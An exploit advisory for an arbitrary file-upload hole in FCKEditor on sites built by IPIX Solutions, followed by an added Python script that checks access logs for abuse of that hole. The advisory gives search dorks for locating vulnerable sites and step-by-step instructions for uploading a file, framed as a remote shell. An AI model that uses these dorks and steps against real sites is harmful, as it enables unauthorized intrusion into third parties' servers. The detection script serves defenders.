Sites powered by IPIX Solutions suffer from a remote shell upload vulnerability. Note that this advisory has site-specific information.
#Exploit Title : IPIX Solutions (FCKEditor) File Upload Vulnerability
#Author : DevilScreaM
#Date : 14/09/2013
#Category : Web Applications
#Vendor : http://ipixsolutions.com
#Dork
intext:Powered By Ipix Solutions
intext:Powered By:IPIX SOLUTIONS
intext:Website Design @ IPIX Solutions.
#Vulnerability : Arbitrary File Upload Vulnerability
#Tested On : Windows 7/XP , Ubuntu (Mozilla & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
POC and Exploit
http://site-target/admin/fckeditor/editor/filemanager/connectors/uploadtest.html
===================================================================================
1. At 'Select the "File Uploader" to use', change from ASP to PHP
2. Select your file
3. Click "Send it to Server" and wait
4. The uploaded file is then available at
http://site-target/userfiles/[YOUR_FILE.txt]
===================================================================================
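Added example, not part of the original advisory: a log check a site operator can run to see whether the connector path above was reached and whether the same client then fetched a file from /userfiles/. The log lines are constructed, and the combined access-log format and the function name find_upload_abuse are assumptions.

```python
import re
from collections import defaultdict

# Request portion of a common/combined access-log line (format is an assumption).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
CONNECTOR = "/fckeditor/editor/filemanager/connectors/"  # path from the advisory
UPLOAD_DIR = "/userfiles/"                                # upload location from the advisory

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2013:10:01:02 +0000] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2841
203.0.113.7 - - [14/Sep/2013:10:01:40 +0000] "POST /admin/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 312
203.0.113.7 - - [14/Sep/2013:10:01:55 +0000] "GET /userfiles/note.txt HTTP/1.1" 200 18
198.51.100.20 - - [14/Sep/2013:10:05:00 +0000] "GET /userfiles/logo.png HTTP/1.1" 200 9120
198.51.100.20 - - [14/Sep/2013:10:06:00 +0000] "GET /admin/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 404 210
"""

def find_upload_abuse(log_text):
    """Return {client_ip: [(finding, path), ...]} for connector use and follow-up fetches."""
    touched = set()              # clients that reached the connector successfully
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue             # skip lines that are not in the expected format
        ip, method, status = m.group(1), m.group(2), int(m.group(4))
        path = m.group(3).lower().split("?", 1)[0]
        if CONNECTOR in path:
            if status < 400:
                touched.add(ip)
                kind = "connector-upload" if method == "POST" else "connector-access"
                findings[ip].append((kind, path))
            else:
                findings[ip].append(("connector-probe", path))  # path absent or blocked
        elif path.startswith(UPLOAD_DIR) and ip in touched and status == 200:
            findings[ip].append(("uploaded-file-fetch", path))
    return dict(findings)

if __name__ == "__main__":
    for client, hits in find_upload_abuse(SAMPLE_LOG).items():
        print(client, hits)
```

A "connector-probe" result with a 4xx status means the test page is already removed or blocked; any "connector-access" or "connector-upload" result means the filemanager connectors are still reachable without authentication and should be deleted or restricted.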